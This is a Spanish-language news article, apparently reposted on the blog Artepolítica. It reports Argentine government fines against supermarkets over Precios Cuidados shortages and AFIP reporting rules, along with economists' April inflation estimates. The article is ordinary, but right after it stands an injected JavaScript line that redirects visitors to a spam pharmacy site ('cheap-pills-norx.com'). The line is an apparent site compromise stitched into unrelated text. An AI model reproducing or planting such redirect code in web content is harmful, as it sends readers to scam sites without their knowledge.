El Gobierno multó a los súper tras acusarlos de incumplir el plan Precios Cuidados

Aunque confía en que la inflación de abril fue menor que la de marzo, el Gobierno avanzó con sanciones a los supermercados tras acusarlos de no cumplir con el régimen informativo de la AFIP ni con el programa Precios Cuidados .
Por un lado, el Ministerio de Economía comenzó a multar a los supermercados , al denunciar que «están faltando productos de la canasta de Precios Cuidados», según fuentes de la cartera que conduce Axel Kicillof. En este sentido, las fuentes oficiales adjudican a la supuesta «viveza» del sector estos faltantes, al decir que «algunos se justificaron en el hecho de que había terminado el programa a fines de marzo, pero sabían que es un plan anual, con metas trimestrales».
Por esto, la Secretaría de Comercio Interior, que conduce Augusto Costa, comenzó a labrar las actas para aplicar multas -como ocurrió en el lanzamiento del plan en verano- al indicar que está faltando stock en determinados productos de esta canasta que sirve para limitar la medición de la inflación.
«Se hicieron los vivos, cada uno hizo lo que quiso y, además de los faltantes, aumentaron también algunos precios», admitieron las fuentes oficiales de inmediato, al considerar que hubo alzas no autorizadas que influyeron en la medición del Indec de abril. Por otro lado, el jefe de la AFIP, Ricardo Echegaray, confirmó anteayer que se reunió con los supermercados luego de reclamarles hace un mes que cumplieran con el régimen informativo por el que deben detallarle al organismo las operaciones efectivizadas mediante controladores fiscales, las cantidades vendidas y el precio unitario facturado por día.
En abril había dicho que el 60% de los establecimientos no cumplía con esta obligación del régimen de «transición», hasta que estén instalados los nuevos controladores fiscales que le permitirán a la AFIP conocer online los precios de los súper. Anteayer, dijo: «Los cité a una reunión y comenzaron a aportar datos», aunque aclaró que, por el incumplimiento previo, la AFIP comenzó el proceso administrativo para aplicar multas de hasta 45.000 pesos. Tras la notificación, en el fisco están esperando el descargo de los contribuyentes y luego se decidirá el monto de la penalidad, que luego puede ser recurrida por las empresas, como en el caso de las multas aplicadas por Comercio.
Dos calificadas fuentes del sector admitieron a LA NACION que «desde hace algunas semanas» comenzaron a brindarle a la AFIP la información. «Vamos cumpliendo en la medida de lo posible los requerimientos de la AFIP», indicaron desde una cadena. En cuanto a las sanciones de Comercio, las fuentes privadas admitieron haber recibido las notificaciones, pero descargaron la responsabilidad en los proveedores.
Paradójicamente, en Economía afirman que, pese a estos deslizamientos, la inflación oficial de abril -que el Indec informará la semana próxima- será menor al 2,6% registrado en marzo. «Cada uno puede analizar el motivo que quiera: por los 90 días del dólar quieto, por la estabilidad macro o por la caída en el nivel de actividad, pero lo cierto es que todos admiten que la suba de precios se desaceleró», indicaron en Economía, dando a entender que el IPCNu de abril no llegaría al 2%.
El economista de la corriente oficialista La Gran Makro Agustín D’Atellis dijo que «el dato de abril se ubicará levemente por debajo del 2%, continuando con la desaceleración posterior al salto que ocurrió tras la devaluación de enero». A nivel anual, agregó, «de acuerdo con el cálculo implícito que surge de la medición de PBI y proyectando el dato del último trimestre del año, resulta un valor de alrededor del 25%». Eduardo Levy Yeyati, director de Elypsis, dijo que «el artilugio de utilizar Precios Cuidados en una muestra pequeña subestima la inflación general entre 0,5% y 1%, así que estimo que informarán algo cercano al 1,8 por ciento».
Para Elypsis, la suba fue del 2,5%, y para Finsoport, del 2,9 por ciento..

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *